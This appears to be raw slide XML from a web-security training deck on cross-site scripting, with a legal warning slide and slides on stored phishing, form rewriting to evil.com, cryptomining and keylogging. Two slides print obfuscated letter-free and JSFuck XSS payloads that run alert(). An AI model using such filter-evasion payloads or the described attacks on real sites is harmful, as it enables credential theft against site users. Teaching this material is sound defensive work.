  </p:transition>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8142 -0.24861"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8142 -0.24861 L -0.08181 -0.10375" pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="30000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="65000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="5000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.08181 -0.10375 L 0.15374 0.00498" pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="30000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="100000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="5000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.15374 0.00498 L 0.51947 0.09284" pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="30000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="135000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="5000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.51947 0.09284 L 0.43309 0.0604" pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="30000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="170000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="5000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.43309 0.0604 L 0 0" pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="30000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="6" presetClass="emph" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="5000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="30000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="150000" y="150000"/>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="205000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0 0 L 0 0" pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="28"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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="1200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>XSS Attack: Password Theft/Stored Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB2BC827-12E1-6443-914E-6E1BA15F805A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2306417"/>
            <a:ext cx="9134217" cy="3128468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5117186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76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>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806536">
            <a:off x="3900538" y="-2258155"/>
            <a:ext cx="5474245" cy="6039916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="190500" dist="190500" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="909752"/>
            <a:ext cx="7473540" cy="4992448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>WARNING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>:  Please do not attempt to hack any</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>computer system without legal permission to do so.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Unauthorized computer hacking is illegal and can</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>be punishable by a range of penalties including</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>loss of job, monetary fines and possible imprisonment. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>ALSO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>:  The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>Free and Open Source Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>presented in these materials are examples of good secure development tools and techniques. You may have unknown legal, licensing or technical issues when making use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>Free and Open Source Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>. You should consult your company's policy on the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>Free and Open Source Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>before making use of any software referenced in this material.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155162240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6826"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS With No Letters!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://inventropy.us/blog/constructing-an-xss-vector-using-no-letters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1131756"/>
            <a:ext cx="8229600" cy="5145374"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(3)")()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3400" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219208716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6826"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>alert(1) With No Letters or Numbers!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.jsf**k.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1131756"/>
            <a:ext cx="8229600" cy="5145374"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317154630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424F77-7507-8945-A746-4877CFAB4C35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D909E679-7C73-8F4A-A0E5-B0E42240BBE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-211301" y="4323365"/>
            <a:ext cx="9126701" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>polyglot XSS for any UI location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056CBE9C-AC1E-FA4A-94B5-E02E231A7AF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8184" y="2387887"/>
            <a:ext cx="9165436" cy="1239065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17085391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424F77-7507-8945-A746-4877CFAB4C35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EB71F8A-8119-F24A-BDAF-A6ABB68E6FC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-20568" y="2148142"/>
            <a:ext cx="9139322" cy="1516739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6157DD6A-8D06-4049-9487-B518A67C405E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7946" y="-5327"/>
            <a:ext cx="9139323" cy="1910480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D909E679-7C73-8F4A-A0E5-B0E42240BBE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7947" y="5408707"/>
            <a:ext cx="9126701" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>show login then rewrite all forms to evil.com </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5B427A8-8D3A-1242-A65A-373757E46457}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-111568" y="3917082"/>
            <a:ext cx="9255569" cy="1264518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246069257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5141B9-E846-454C-9D83-8789C357A6A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2867775"/>
            <a:ext cx="9112164" cy="1822432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D909E679-7C73-8F4A-A0E5-B0E42240BBE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="643467"/>
            <a:ext cx="9143999"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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>mine fake money</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="438359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909E679-7C73-8F4A-A0E5-B0E42240BBE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417399" y="643467"/>
            <a:ext cx="8408193"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kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>keylogger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0002D93-9C7E-E94C-B936-342AC063E4D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
